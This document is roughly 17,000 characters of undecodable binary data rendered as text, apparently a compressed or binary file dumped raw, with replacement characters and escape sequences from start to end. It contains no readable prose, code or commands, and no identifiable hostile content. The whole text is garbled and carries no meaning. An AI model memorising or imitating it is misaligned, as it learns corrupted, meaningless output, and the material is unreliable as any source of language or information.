}w��a�Cº�X�q�J8k$�͗$�=�ޜP\"��+��xI��I�UZ%h�����pw����w�1q�ĸ�)Y#됬iO��4ޒ�n���\r���]&YO�&Y߃I6�\'J6]L�l��K��k%��f%��XH�t�I�\rkGL���u����7+$6��o$�����%�՞�؞�؞.���J�5Kv+zH�O=��ל��1�\'q�o�8�\\��s��>!q�D�8[�J\\N$�J6OJ����NI���%���%�7hK��H<��$�|�Q���/KrB�PrҨKr��[�_�� � ��2�$���g��6^rJ�����)�i����O�$g� əۇ%g>�%g+$��$� ��s��s��I��I��씜+�IΫ=���\\( ��/ .], �%H.�H���J���IB�3$a\Zɒ��DI��I��亥�$�$�q�$�\Z-��\rJ��$7e���.ђ���%1Z$I�:KI��2Iܡ���`I<�)�s�V��U����KҠ I���$]�$+3Q��$Hr�*M�P��ᬚ$���j��F��qE�k�\\�}S�� ���H\n��$���«ђ�xSIaҬ���h�RR�{,)I�%��ޒ��1I��CIEx��2礤����J�ARm�%����.��4�\"J\Z\\+$\r㪒F$H�8yR�t���)���i�P���(�|9#i^\'iQ�%i)�*i}K�v3B�f�I{��������佋��}�C�)CI��|ɇE)�m���D�#�*���/��{#齬/��ז�.JD_%�H>��K>u&J�V�J�7\\�[NH>J���yJ�$c��������%���I�_0�LhޔL��$���d�n��H��?%�O]��PL�믒�AP���\\����@�ߒ.�ߩ/����R9�T*��H�tR�p��ta�D�HiN�Q�.:�]���C�f� ]�}�T�}D�ie#]��A���H�H��Z��I�nI�^�K��\\�j�uI�v�K��s�ڟiR�|�T�e�T��$]~�TW��t�,%8}�F��������R�~D\n��H��\Z)8�)%tKI{��$ǍRȓ%%W�Ka8\\\n_�&�+˥��)�K*�J����[3RZl����U��Öb�R,kD�\r�KyOܤ��{��y��W�/��J�����d��T*#��Ke�ER���}�t������R㿇�k�nK�]o��+Ӗ���nH¥j�I7�n�n���?��������M�Rsz��\\`\"�b�[�ŗ\'��)���\"��C��m���S]j�*ݾ�n�Օn��G�CYU��$�q5@j�\"�u���e&J�jR�w�Y���V��M�m�:Y8J�\\ǤR�>�Kp���\\zp�Q��A�mX��&u���ڤ�t�`K�_W���R�F9�1�Wғ�5��iM��?\\�gH���K������m���i陧ۤg���J���_ܥ�w��J�Ul����/\r��,����r���Hz�\Z�^�I�^uϔ^��,\r寒��Pix�H\Z��-���/��Ko|��@\Z5,���C\Z�jP\Z��#���K�zH��^H���ISU.KSeKӔy�4�4�%C�,͌�%͚����s�fۆI\Z}�>��F��J&��-��ɐ\rI�����`H��r�Ŷ��2tRZ��[Z��K+�b��\0i�i%<!��}\"�Z�I���Vo�V��H��KkNK��z���祵��IkgWJ�Һ�5Ҧ$�]�җ�Qi������:ik����r��mFQڮ[ mw�����I;�VH߾�!}7�.}��+�Z*�&�~�F�4Iڳ6]��T*��Q��EVI������l��鐲�t��[:t�t(U[:�N�~~{W:B���:8Iǔ�IǯJ�|�_�`�׀5� gX:q�V:��Nf�Kg�H�ґ�J)���z&�-�KW�����O:��F:�/�S���mQ���L���)��)\\��)9Ȕr�ɔ �eʏ�e*�.���}2Տ�e���E��e�$�L�T_��P#[��l٥!���*�N��L�O�l9�D�{f�LO;^�B�l$/[�c�l�a���ʀ�<xtPF�(���AוdP�^yℌ��-��l��ݝ2ꦅ2:妌~�HFv�1�e̓�2�Q��e�&cyre�g?d�G\'���U(�5��wKe��wd���\0��2���L|�#�5�d\Z�2�y٪��j�#3�ӻ$[�]$3)T�����6~{,3{_)3��WY�,bd�K�e�Ρ�mG.ɶ��.���(��Ge�Kd��ze�m�2���e{0_ٞ�0ٞ��2�2���ӷ�2W|���y������X,;�\';tz��F��C�/�ȧ�<��ʎzʎz��<IKd���2/E�츪Tv���DO�/�m^&��-���������|�8��PH�Jd5�T�>���|��I�\"*�V�HV\"# EYY ��H�J��\"��������羯��2��\"!�����!^:�Y*�S��t��EwC��e!~���U�\0�Ð��ڐ��<H�l$��r�;$*| ��~rG6r��H���]�/���z������C<H�͐(]MH��DH4-\nr����:��q\0r�\no�I�w�d�\nI:4I��$�[ARԑ��܃�G2��GƋ�GdG��Q*$-����^�>�yjt��/�<�<�-$z�-��o3��o,C\n��LH�� �P9R�6R$B�l�!E�� �i� /��A^=�)����\0)�{)[���H�62���y���R�\n��Q\n�Z��T�x�6Հ�M)C\Z.hC\Z<`��i H��H����k������l�zw �Zp��qX\n�Q��� ��O�m{��\\����=\r������2��\r2dL���]��!�F��a�d��.=Ȉ�dT^2v�2�_\0�&��])���T2����LdžA�ST!Ӄ<Ȍ[,d&�䇴d��\r��TY�yC�m�,�{\r�um+�w�d��\n�<u�j[Y\r�BV�.B�8�C6�Ő�Cs��g!��@�>~\r�wo���ȿ�`�D<*0��%��d\rT�X*�ׂ�<S�n���Zs*��ݾk��T�$�{�g U#�@���\Zw�\Z���ҡ��h���P��P���P��!P\\ T��\nTw�T7\n��/��=o����w�@�2� 5���fN@Ͷ�@�<��:=2�(R�Z�k���\nje� =�� =��$�8�\r=y\0\nI�B��Н(�\n{���bBg2q���T�b�B�3P��>(�F;\rJ�����@A�(�DJ2;��j�R�uP�(�U �3���2�����P;�>qʾ��!�r�Pn��@\'*|\0���>~��G���#良�Pk��Г�/��Ԙ��vnP[��Pۋ���2�PG|���C蹓f�sE=��+Pg�6Թ\ruQu�����t�@]��Kz*�K����JB//LB/��A݄���f\\��0,�j� �ƀ2�S.�ַMP�X%�2z��<��U4�54pY\Z4m\r6�\rƞ���>\r��BC#!�����;��л�f�w_�F���>���l\Z4Z�\Z}�94f@\0�\r���?j�;�O��&����.h��sh�Bh��!h�Ї�hJ�%�#��\0�*}����&4mv��@�������!��x���L*�IB 4���������\0ͥ`�y���<\'h^|4�\r�7�\0�;�o���B�R��whq�\"�8h+��q9�$DZ��\0-~}� }������A��F�e����h��9��4h�!����7rw��������76к���sg�\r�,�\r�K�&�oЦh�&ڲ&���C�̡�n\'���z��eh������=��3G�]ڇ�]W��]�Ю!hw�Oh��Oh\r훔�~�x�yQ\r��E�~��: �:�z\r:$����@��\\�ãI�QMK�X�:��L��օN<����N��B�Ctl�����y������\n�U�Y��t��t}�����/h�߰L����I7L�7L�UL�&=\0�je�6�V�� �0�\Z$L��/L�}&�� ���l�EKؖ�k09��0y��0�L����2LQ�\r��YLI#�|Z��Ry�*u�J;S�S�����vj�v�Ca�\Z�aڒ�0�+7a�)�a:F]0���|�w�L��l;� ;�3Pk��T�`F�U����{�̳�`�u�a�B�a�Fp��K��}0�ni�1]�qӋ��`�߁A�2`��;08�\Z�̀!?_��Ս`�t�H{��?���90R�4����k�菮��Ga��0�\rcz�1}Ca�=0j��c�oax����W��N0��\rL�V���]x���+L|�L|? vn;1��v������N���\rra��!ؙn<��>�S�:�b���zؕ�0w�װ�*?aWuR`�^��]7��� v�\n��\r��:�1{���9�|�L�����&��;\Za��)�`A8,8�#,���U��Zf�BQ���?XhM#,�s��6kXD�8,�-\Z���R��i��ݓ��+_��Y܅ŝ~�__�=�0` �TXB�,1\r�%���t\r`��ðG7��R�Ka��<Xjc��@,M����K�܄��a�#c��j�\'�?aOTzaO�27�e��=�+²sXv�-,/ ��V��+��\0���$5X�X�1/X��KX d\rV�5\0+���~끕�݃��v������L|`e�-�2�YXyr�b;VQ,{]~V)J���\"ao�zaU\"GXU�3X�V�,V��\r�;��KW��i��M�`\ru�ƙ���[�`�q���<�{ \r؇�c���.XG���n\0���-X��/�~���p#X6x� 6t�6�7+ȁM̙�&�ra�z���)�N�TO<l�� l��:l&z��\Z쇽/�G�l ��l7��5�a����`������~���~#�U��V̼a+�Va�w�����Z��+�a��9���;a�&n�%�7�����n���F�c�˚p9�E�<R\0�o�o�\0W�n�+���3Zp�ye��\\)�+|�F=|��\Z|\'�|\'�<\\9w��B��f\\���z��w������N��w?�5ͳᚐ�p-�4\\�V��|O�2\\۰�����# ח��� ��^�響�識��h�\r�~�����\Z���T�^�\r�Ϳ��u�.��,��[*�]��@��?��8pJ\r�x��x_\rG=�G[n�Ѭp��[8>�N�h���2Cp��~8��%8��:�w\0�������p��}��I8�,n�]��4h��\n����������~����N���=\0?́�MK�;���M��Nt���~qk\n�UI~9�/���G���u�+���+o�W����~{���$�հJ�����N=��\r�M�0�f��f�9�����[}�^�+s��Ӈ������A�3�`�+��x(�!<�.��ք���z���NL�#{�#�Y�c����3�� ?x��~x�<��ix�D��&��n]x��yx��ox��~x��q�ӣ����b7���xnV$<��mx^�&xއZx~����x����px�-^R��yZ^:U/�WU�W?<����yl��Ɛ�Esx=�/�mr �m��Q�o���8�9��\'��~�NP7�oM��?|Z����;z���Y���m�η-��x��sx�&�7�\r�;��������r5>p�>p�\r��.~�\Z���%�G)u�Ѻ���{���3|�e >V;)��[���?>\n�|>�F�OA���W,���^��JK����\02|Q�_���[_|���H�/��/eB�+N��g��\'����g�M�\0�R�4>��xHg�Y�e`˛��ܕj@�m7 7��w= (���P���6�=�\'�=�ؾ�P����g ����j��\r�~@e�\0�~������0�z�I`W�/`7xؽahտ�.{>{��{E�ޭ\Z@_a�k=�4\0<;X*\nn\0F�ˀ��$`��`����w��̀�;\Z0K����UG��\ZA������e��6X�]\0�\"�1�R�X�p|�p��!\0��@���YU\0�R��>�?�\0�?@~�(�,\0��`������\0x�%\0�����\0O�`z7@��H�V\0�� @>�\0�7���\r��v ��]�<:�h0�_&�]�;��\0!����R\0�%��\"8Y{8-�����98\0�����r\0���3����p��8_+ 89�g��\\H.�W\0�(���a�ʯ����6��?n��7���[\'Wi1��x�ޱ��w\\%�p�=�)�\0���_�[��a(Y\0��@�4����;��\0wt��8�\nDV16@L�p�};|�]���q��xO ~QH��.�I� �~Hf�\0��H��k��\nE��\"H��r׀�z7 M�\0H�\0Ș\r\0�\"�����Y�T�٣\r���3��C [F\ZȽ\"r�zo%���ׁ
R���(��wt/u�����W[���q@��P��\nT��o&T�*�N��<Pu�T�[���긣@\r\n�� ���C@�j)а���f�T�9�7М��Em�G��ځ��X��h�\'��`t)9\0]k�@w��#���4z>\0��H�s�\'�_a|�8|�j���� ��K�>C�ٛ��=�V�����5`*�005�۸���)0}�;0��\00=m �.?7�?5��#���c`�H\r����j��<,�f�����t`e���kҷ�5�`��!�^�\06HP`��\0�%��4�ċ������B��\'��aB��\nBv���NB��b��4b[s(BQ_�x#���4B�$�Sr/B��P��C�����҈]��\r��n���c��=�ڦ;:/:5|�n�B/2��b��7�6boN:b����_ā���\r����<���Q�I�I�ɣ ��QY��.\ra6pq_�0O�@���G��@X�(GX<��8j��8J�B�<��<�<+FX9�!�<U�=.!��\" �!�Aw������ ��7$��@=݄@\r�#����-��*�#��p��[1 A��A�݈ _-EP��=�d/���(��솠� �7,}\'�`OU!8� N� B��B0�!< D]c�\r�5�2��M;�)B�TD�T_��\'�� a狰͔Gة3vu�]�\"�ޢa�:�pP G8�G��?�8C�F���A8�<@\\�#\\�?.���� �+�:n����Q�զHĵ�/�kk��S/�\"���\"n��7�!n��@�,�����.��\Z�eQ���:��f �^#���\"|��S���\Z�������#��5�}C���5D��_D�V���\rqgp>���x�\0y$9g�������\'#�]�E�JC��=���Q��mB$�\"N�G$�F$��#��I�. R�_!R���<��?i��#���\"�c��fē`_�S�ۈ��4ijE&\"�H\"{*�C�����E�4/!r�v!�̯!��ш\n\';o\"�8{%������#J\r#�&e�D��^D��oD%��F�\0Q�2��`�����16�Ad�hqD4<.C4� �$kM�pD�\'KD���; �_�C�X�\\F���@��!�F�m�$���h7B���шN<��A�s!�\r�#�o�\"�__l�_AD��U5 �U B������C��� Fۉ����.���툩]͈�>Y��\01�y1h���!殧!~��ra����Řį�<�R�>bپ\0�\\�X��A���\"��=@�/ 6,����m!��)A����Wn��7v)qm)53���@G�\ZHY�6rKBrk)\'�Bʹ�!� .��8�H�r����/��B��\"w^x��Y�T��D*_�\"ջF���AjlnBj8!5F\"5/H#5_!��!�� uMj�z�k�{���G���KېH�`^i�Gi�\0i��4\"\r Mբ�f_7�GR.!-�u�G�|��fH�gG���1��7\"��H��9$43:v �Ӎ�s��\0�#���D�C�_w!qR&H��i$.+ ƞA���d�m$y&Iy;���}B�V�\"�zp$C�ɜ1D�%#��d$���� v#9��HN�7$3�͑��q���)<�)�;�K6 Ŕ���y�i�T�it$�v����0��Sy�v ��c��6�35�g�aHǫL�9�\Z�E�y1z�R���a�Fy��yY�y��g䕯ϐnk�ȫ9��K��;�7��\"o�Aތ1C�J�#oM�Ez�� =����\0�3�����Y��ߟ ֯\"wB��u\"Cj^ Cc ��!#��@F8b�>���*LdT�dTk2\Z�M�C��Aޛ|��e%!c/\"�d���6!h�G&X�!⺑ �}��ڏL�iD���\"S��#S*/ 5^E�I-#ӐBdZ�12�b��|��Cf�ބ�,���z��̪f#�ۜ@�~�|q�|Q�\ZY���,<��,��F��mC�<�,�iC��YE�R� ���2�Y��B�=،���AV��#+R*�����O�o�5 �L���C�j�1d́��S���_�w�!T�l�7�l�2F��ތly��zW�A�4�\"����5�C�(��L=����+�e�Ǡ�ȏ_���w\\��Ȏd:���Y���y����@vyU!��א�w�#{�ӑ��� {�j��#�����|r��9p59S��[�*2@��C�����V�A~7G~�lC�܅#g�7!�E\"��Ց�I��s�C:r�2��#��}u���S�\\cB��+���{Q%wP�v<Em2�CI:*�$�K��~Fm�YGm���N\"�d�CP�R(���(�$j������������m=�x��R�HG)�Y�v�5�vr`(�@1Jy�R!!P*��(���P�Ue(�͏Q\Z.u(M�h���~�V�<Jke�s��[ێ�S5F����cPzQ�F�P�6I(��+(�E�>�\\ԁ\r��T�\'\neh�2�k�2��2=�2�g�2�F�>�@�_�GRSFj�D���:���pR/�C1��/e鱈������.EY�����Q�[P�D���QL#�5�J���$\"���P>�(Tm7\n5��B/H�0�P���(\\�\n�����D]Σ�q�P��R(Ra�\"2C�RTP�R#t�2�@q2tP��(��h�pT%�9��uC��*EY��@��8���ġlhn(��\Z���-(;�Y�=�ʡ�:3n�:+��:{�r�ي��ЊrZ�D9��.�\r�\\�\"Q.�}(��%��r�A���F]�`���{��b� uu3���,uss\"�G(�fL*�3u�}��[���y�צ��-U�Wz�k������ك�5^G�>C��tG�?,D�;��Q��Z��FT��*�u����&C�hE�SŢ�eG��NA�_wF�:��4D%HY�\Z������u�P�w��R�֣RPS��v(�Q�\'ԣ�T�)T��鞿���ͨ�? *K��zf��z6��<S��N��}:*[�&*;�\0�#��ʍ�D����%�<����� *�Z�\";U�3U�]�*Q+G�t�A�jY�J�2Q�6�Pe�_Q�\\T�� �|��8����CU�Z��C����&���˨ڑ�:W!��^�����g�ag��u�4�zǸ�j�B�p�P����Q����OjE�.�\\TwQ,���ST�foTߑۨ>�c�� T��j@4�\Z���gQ�\ZΨa��ᦧ��í��c�Q#�F)gP��TPcSq��Էj\n�_�� 5u��e�B��>���WD-�M������Q�{���Ԋ!���ZcP+)K��� ��y;�?�Kh��>��M�ehɜ|��]h)��Th(Z�cz�j4Zֺ��F8z+�,z��h����uZ��V�ЉVX@o[>�V�JB+����]�ۋ\0��o��N�rt;Z�#\Z�R��V龅V=~����&w��~��5��uS�q��1=�ִ%�5����F��u���u�h=�E������O�Ц\rh����CW��C��aqڒg�>�&��<�FC^=CC��a\Z��0�\Z~�\rĝC)Ј�P42���2�Fͪ�1��И��hl�#\Z���&Jͣ�\'����4I5M*�B����T���KE�j.��n�hz�4��Ds��@��u��i��{%Z��-��-ο�>1GA[k@[�j�O�Z�m6h������ ��]��oh;Z�N���a�vhy�>�d�v,uC�\'E_\Z�/�B_�=�v��v�?�v�B;��/�D����]�F_���v~\n��\r�n�v_;���倾a7�����&�=���^Z�^����;\'��w�o[#Ѿ�L�oV-��2: �H�G<َ|U��`��DS��P�4tX�}���N^ A�w=FGy���������0t�a:�*:.�������~�����B\'�9�N��G\'->D?YC?��~�B@���@����=�+{�O>)��z�3�*�����g)��g/9��/���ߣ�g����9*ѹ>t^��E��ş���t!�]h�A���D�B�ѥ���24]��F�o���fЯ�ѕ�k�J�qte�i�r�Tt��1�*�\n]U�EW���{H�\ZQ8��V;�v*��B�n�F7?F7�E7Y�D7�z��!\\���~?�n�}�\Z%F�>z����ݦ��Vd�no2Bw\ZDw���? �П�^Aw�v��\0�G���k�E����,<F����K���a+>zxh=�==�U���A��]F���[\Z���=a\Z���������\'��S��ѳ*�蹪N�ϠI�ϻ��?z�0�^�?�^>��^�C/{�@���F�����A�{�迈��(_��i1f�LfS�w���i�T�̆\0��f�C��>#W�#C���f[�f�A��L;Fi�fg�<F�vF��+F��ZݎQW����b\ZFS�\0�6�т�`���`t:�1�W������}G�0�\'1��1�́,ḰzU�vc�5cx��1�[�1�rƘ�bL19����0�N�`��9�݃�0ga,\Zl0Gyn0���`�U�b���@$�0��U(n�O� ��0�J���� �2T�\"�� �3���\"�apcV��\Z��7Lb6G1`\'CZ��P�\Z)CG`�f����2��E�Y4��eb���1�-� J#<2�}��X��ÜTm���?r�`l�a;�.�C�̙�A̙��9�>���Y�����f.��WWUk���2�-n���(�X=�\ZIs�^���l��٘��� ���Y��0y��p\\�x��b|<�1���0���_�@�o��wL�s��yc\"O`>dc��a��1A�Z��2L(�J���;��pP�DNc�\r�0�TLܿ L|Z>&�*��r�hx�x6\0�8?�Is�<�y�R��Iy\'�I}i�I��a24I��W���IOL��a�S5��L��/&�!���&gq\r�����W0y��1yBL�nŐ�̋�0�buL��`LQ�OL��)���Sr�y�q��\'S�Պ)��{yc^wGc�|lƼ�ż�J�Ԋ�c�:%c\Z�ј��lL�R2�I����)���}�/��R�i��i]�bZ�a>�6a���1=%�1}7\'1}�g0_�*0���0���1�%o0_ݛ1����%���-̐ 3��\r3��\'f���(���0Ōw`��b&�a&fr1S\\fʉ��؆�����Ml�����,��c~��`~e�a�J7c���0���1�����KW̚�K�if=\r�^��]�l�����t�s+�y\0+Ř�J9�J];���b�T��K��m����*z�۾��*ʝ�*�<�������\n���&v�+�U �Ī��ê �X���:�����Uv�Z4V��?���V��v�!��L>v���;֏���Ww�_b�Z�5���\Z�A��jVX�kX���X��籦U�f X�%-���]�?X�Wu�C�6�Cg���5���ܰG�naa+�Xx`^�,faf�X�9,�2��Emv�b.\Zb���Xl� �pyK�pK\Z�~��~,�f�&3���Wci�X�6/,�J�1��r��rM���S=X0��E`��|�P�+|c�EaEe�\'��Xk���� �dd֦�:���3�)�F��P����<���\rĞ�S�={y�蜍ut����ab��O�`�Ō���X��%��c���)�u�0�\n�9\"��q����`�&r�^k>X�L���Z��]>�g�{;��;�{B\Z���\rt�`���`��`��\\�!2�!��ؐ�IlĶ�HM,6J|\Z�� �(����6~�Gl�K�+\'���\n6��;lҏ}�d l��6��56y<�0���}tS�zĦ�}�>��f�[��o�`3We�906\'L �r�?��bk0��;��dl�B\n���>��|[�>[�؊-�0Ė�kþ��a_eIb�X�\n��؊���\n[1\\��������V6��V��`�{7ck�-�5�]�����l}m+�~\n���¾\r��6\\��mh��6�MUV����wğ�w��-R*���ؖ%�^���/lK�:��g#l�lk�Klk�3�M�mgVc;����W��lO@��������;��;x1\r;Xe��<�=���a��{b�7R��/%�cͯ�S�۱S�wag6!�?bag��a缾b>�.��bS���懰K�ؕ�a����\0���*nK\Z���\'��\0\'�/\'���y`\'����q5��F��2�m����n;�m^�ms�m��)��qۧp;�q;�Gqʇ��T���T{`8��pj�qj?�8��s8�=18��ݸ]�q����up{�>�t0n8��;pzS�8}�<��>N��$no���(n�(g��\ngb~g����xę�1p�aX�u;��Ew��4w�+w�ކ;�w����A\Z/�`5�8��=��>��Llq��Z�Q��rq��G8���`A���p��ӊ#ٌ��ك8���Rꅣ���hkn8�},����2�ı���~ǮpƱ����p��A8��8!�4N8҈�)�įcq��L��\"�\ri\Zg��;�w�&�y��$���F�m�V��!m�}�c�})�\"�Q~?Α��觊;�G�9��9�qNo[qΰ����8��p���W�[�����[-�ቻ�[����������cpu�8�=��e�p~��8N.@�\Zpb�\"�t��$�a��M)����`�\\�0:8�/G�\"\nCp�s��M���M�{� �{,%\\܍~\\��;�dz5.�n ��ي{���K�Ԋ{��=�Q�=�=v�åA��\'��q����on�g�q�����ߍ�r��r�,p���q���qy�P\\���9���[qZ���ꋸ�I+�K�/��{]q�j�W7^�^%|��+��*�eq�ٸZy��9�k��]��4\\X<���k�{�=ZõO#pb\\�7���N\\o��p\r\\��=\\/��\rډ���#9�>���=��[���-nPY7�م>S�yi��ىyw7���^/n\\+7�>�1�}���}��p.2��f)�d�ܔ�s��v5�T17Ca�f�(�f�!��_p?�U�~h�q��F���q��ɸ�e&�g(�[\0����E�c�҇Vܲ�0n9\Z�[~��B��VA��/ܟgŸ��0�z8���m8��6���6f�q����_q�f����ozp/��^�f/�㏗��.P�R��ͪzx�/[�����j��������r��M��&��ea���3x�ox��A��0�:S�W]��� ��^��]($~��R���]�n;m��� ��^��*9���^-�ﻕ�����o[�߿T�?�4�7�T������qxc(\Zo|Zo|�\Z�8�o� ��\0o� o���77ދ?T�?��d�o�>�?Ƥ�o���㡖���<���a��\']��_C�\Z�x\Z�~��\'���IE9xR�[<�l+�⤋�z��i-�x�{?�6�g�N��\'��|���P��2ؔ��nD�7�x��SAd�i�:�6h3�{��x)��R9�®���k���6���1��9�)�\"����FŻy��݂Yxw�5�{`9��v�:\'\n=1��4��3�����5y�M�x�P\'��9�U���{�}_�+���A��$��Q���W��x|p�\0�Y�s����h;��<Ћ�5�G!y�h�1|̏|�o|\\�>�����������|B�K|�\'�Ã�����F��A��\0Y�c�����7}����g�N���a���y\"�>k��9���ղ��՝�������0��/:�/�؋/~��/!��_Z�×�\\��;������O�+�L�\r��<�oަ�|��U��՛s��[\"�Փ��\Z�<|�9|\r�)�f����3���`|c��y�k�;R��h1��m������b|k�;�u\0��xm�=��%�{>��{k�>W���\"�sa\0�s�v��/��P�\0�7~�(?ڑ�c��*��c\r�q�b��G\n��u���m��&�\'U�d~�~*D?�x?=�����gXe�9I&��M\r�gy\r~A��>��}m�DQů�?}\'����k:����2��g+�z�V�?�s��M�7�n6�Bk�fs��^������W�6�U¶iAQPFPl� (N���CJ�B�R @P\n�\"��\\C��}���5@P��4Of4�n�*��p6��/ �%ho�K�\r{AЛ�#����WZ{/�����.��}�%��~F؟��=�A��PΆ`��&f\\\"�f�~<$��E0�W$T%9F��+%��� 0�\"ȟ# �v���d���3c�!`�)��J��gpʮ��:o�H����+Aq/�(5L ��B��\"P+�h�#ڽ�V����G�|�&p~�����Us? ��w��$����ęL��J!���Q���+�F��p\nM8U��p:*�`�M�`�z�`�s����eF8�A$8�.�_�� ���.�_.Ğ#8E���J��W�\\z �>���وpu�9�b�u�k���\0�#�:�#�����}���]F���|.�|�/<��� A�Ƅ�M�$�RjB��fR a� w�s �ubB���\\�!D�&b� �do�������!iw:!��@Hz���c���OHY�NxԲBHmxDx�\Z �IN�_&��J�<*\"d�� �?���\"A�s�=��(5B�tB�oB^t#!�ԗ�߸�P�͖PdRG(*�&�p&���%�����+�vB��O�k��m#�R��������AB)�����9��ފиExw{���Ox(��Khu�Ah�)\"���\'�� m�TBۥ;�v,���S��+�K�è�\"�_�� _� &Մ�a��\na��a ��0�jO\Z\n$�L #�Ƅ�|��M�0��Jo{D��L���\"�0ٜK�>�L�1�%�j�%�em%���A��%,(�<F�u�_u¯&���[Y��8a��:��CEº�/���\r9+0���y���I�7\\G�pN%n�\\#JY#����$JGe�.D�@}�ll?qˑ-D��1�|����/q�cQIz��Tq���qg�<Q�x!QU��O�ew���ZM�9G��A���Q?�O���x`�@4D�����F��m�D�M2�C�a�CMX��o_�GJ{�GY|��o�D�����`%N:CD��/g���}D�\"f��9?Hĸ|\'b\\� �fDB�6�(�@$&��CzDRq\r�\"�\"Ұ����D�Qw\"�Ld�c��7D�b\"�&�3K�nw\"r�\"�a�7�K���CD!��h�J<�K#�\0KD�{%D����v�OU3����O�#���H�ӵ=D�\r5���k����6�!E�x�����Çx��9��2�xqLLt�^&�Ʋ��S����p���9ѝ�Jtg8�˺��u(�ՂW��������*D�K\'�Y�Dω/D/ ���+�����L$���%�ϊ�AS3���P�0b裗İ���w\0\r❟�Ĉ��C%Fޯ F)3�Q�.�\r���Q�=�b��U�iCb\"CL�\\$&p�I_]�)oƈ�\Z���S�^�*3?��_���m�z�\'���\'����W��w> f�]#��D��0$���G�zI,(/ }�&1%�T~%���!��t\"��� ���&�>-K|�v���ʎ�&�)�Zf��r;�X�@\"֍�%ֿ�!���Nl��ج�HlU�\'��|I�p߈ئbOl�#Il��#~<dO��,G�h�$~R{F�{T�=�<b/&���Λ�Ž�د�J�/�\"�s#�[�Ó}�Q|6ql���-���3�;֒���i��}� ��� D<q#E�2�J�:[L�����a�����,T�8��8��qNSH�[�&�,�H���L\\�I�}#���5q�\0qe�q���=J\\�?F�Ѓ7�}��d<�M�w�M7��M٠$� J����}�@Y�bpK�\"(�\Z���e��7;Pqh\n�����l@%׃��%p��p�_P9LTyՒ �Z�uP�F�YP#��X�w_15�4P��Զ}�(�������hp�=p_�6��f��&�7���;�*\r�AC[6h��\n\Z�dA�D�xc4)���w7��;@�QU�`�h�� ��-H���*���X�\nI�B7�0���a�� ,o+����� B[\"� ��\n�B�� �\nĎ����X����Ab�1n���:�dS�I�*+R�L�T�\0�v��ͪ�� �(��A�9d � Ț�\09�$�+8rW ��%ȟ�\nl�@�S5(4v\0E�r�h^K�\0OXS�SN��~W�63�3��,CA{�\\�ڗ2@�v1�p�?��Y:x���-���[����v��3�!x���|7/��\r������d�l(x�9����\"��~\0��Q^���75�7�c��gM����7���*;A�<��\rz�[@o�\n�a��\0��k��zv���\'�3������k`�0���*0���-@�w�7��O`�aY0Z��9.�[c���X�c`��50^�Lx�\0&Z�]j�$�0)�>��/|�z|���H7�)r��!0��>r�O-L��\r�N7�i/���\Z:��i7���f�Y�O�ۀO�{����L�H�&E��p0;�(��e�$��9��`��0���#�\0����v;��G��9��II�P�Xx�\n,�g���tX�s,Ye�/�2�RU#��� ����,D|�V�ukd�5A�`m:�۳�K��=~\0|�6��\r�!`���`�\Zl�n?\0[;(��X�-?vA�v�\\��8���~Bi��������J���S������2�_���=���<�5���x8���!g88�>}�\rS}��i��}tp�]N�\0�����C����s~8\rϽ�Y�b�A������\\��.-���z���[�\r�P�D�]�&���l!�4ڑd/��䤴I�\\\"I~LDR��$)��\"),rH��bI۩X��Ҏ�4��%$ej4Iy���{�DҴ�#i����I{�H��%H:�\\�.�K���1Nڧu��/2�t��O:P�L:0D2t�&G��L�#��F2?��t�Ճt���t��\"��d��8��\Z�tO:��#�#2&YB<I�� ��\r�JN�d5J:~n�t��\r j��ϭ$�_�H�N\"ȉ�ԁ����$�� �V���/�P�{I���$\\R 7�\"\\�$ұS$��8u�~4$�L��$��{�ؕĮ�#q�I�K;H<�)�0�$����I\"~#It��tB^�t\"c�t��0�d���!�t��d��G���%�V(\"��SI��c�lo�_�.X�.dM�.���ՍH�oI���H��RI�C�nJ\'�n�#y4Z��:X�۷�$� R��$)��4�2�F\n�#�h��4����HQ���;Hҽ�vR��)vn�]R܋bR��R|�%҃ě�D�dR�<����OzH��D��O)�J)gHJ��G����RIy���6��r���_���E�3����\"R�11)ە@�}M�{Lz� 蚐\n�\n�jIE;ߐ��\nH�ˤB(�tY�T��G*�+Az}�5�u2�T�>A�\\+$�1�$�醑�,FHՏߒj�ɤ�k�Iuk��ӓ��t Ro�Yj��t#���!����r���ҝJjY�#�?�@j婓Z���>l�Cj˄�ڲ�H�/�H�f�O���>� u=�&uC�I�qOI_�6��̮���dI���I�UHa��o�!�&ҰUi8҇41;O���4�w�49�$M�=\"M~L��&͜�\'���&��%�<cE�����i^� i>����t��h����E<���H���AZ��I�R*�ՠR�jz3i��_����!�����WIݷ��ݷ$K��%�\0���6y�d�d�L?�,;�BޒPGޒ�!ˁ�d9j;Y^2�,��JV� +�\\$+>o\'+�ْ�+����Kޞ�BV��K�I#+W4���O�U��U��UU{�d5�R�nC&Y2Le�����Z0G��Y���;F�1\'�5�I���l\0K\"\\Y% [��Y��&wk�&��&��fg�f�d��m>����H�\'٢<�|�w�|��3��J��-���ߏ�!ʞd��m2d!���#������ddHF���Qrw�h�\Z2����Q�$���Kdr�L� S6�Ȕ�x2��Nf���9�2g\\��u.\'�uc��2d��\r� ރ,̸EN�\"��k��>�O:��g�u�dk�G�+�)g4�6�O�M�F�-� ����Y)䳮4��\"�<��|!}���{���Gv�;I��O�8�Cv��\"�4�\"�\n!�r�Ȯ�t��\Z��#�|���|Yv�|�~�|���|�ѕ|}��\r���<�|�C���&{溑�5\"�>`\'٧B���\'��\"��&\\^!����f���w���$��O�C��ɡ�prXl=�ΎEr̵o䘛S�{Փ�ѻ�qug��ƒ�f�����+�����-��I�,r�cgrr�U��-&��f��8r�T�1T����*9��9ê��d�/�Ih���K���dr&y?9sΞ��V(9�_Cή �p��9���ȅ�Brіnr�!�\\�q�\\|�N~�ҙ���}�+�C���e�7��!��z�`C�� rUf2�Z��Z҇\\�W�\\�H��ǐkT��뼤�o1oɍ��Ư�M./�Mo�M����y�Z����{���rk���O)r[�#rG/�ܹ/��_���ɽGB�}}���䯼���&䡚���3��Í[�#��x�� ���\0�<:\r\'�u���~{�߶�$O��\'\Z�ȓ���e�i+yF�N�9M��M�={�<�5�<\'xD��ZI�W�E�oU#�zM�enA�����������$����ku��+n�;�)���/�4J�����ź���Y��ŭ��%4��p�E��1E�\"e��&�sK%�7EU�E�ZLQ_���ʣ��G�H{J�M,��.v�h�8R��(:u딽�\Z��&��6ʁJ8�p�%�0��b� S���)F���1�4=�b�N�bFR̃b)�e\\ʡW�#�K����}?��)��z��̗ȥ\nP�\0#|\n\"P�������(�#�(�i\'\n�� \n�l>��_����g/Qh�W�Gi\nc�/\ns�Ha�p���La\'�pU����� 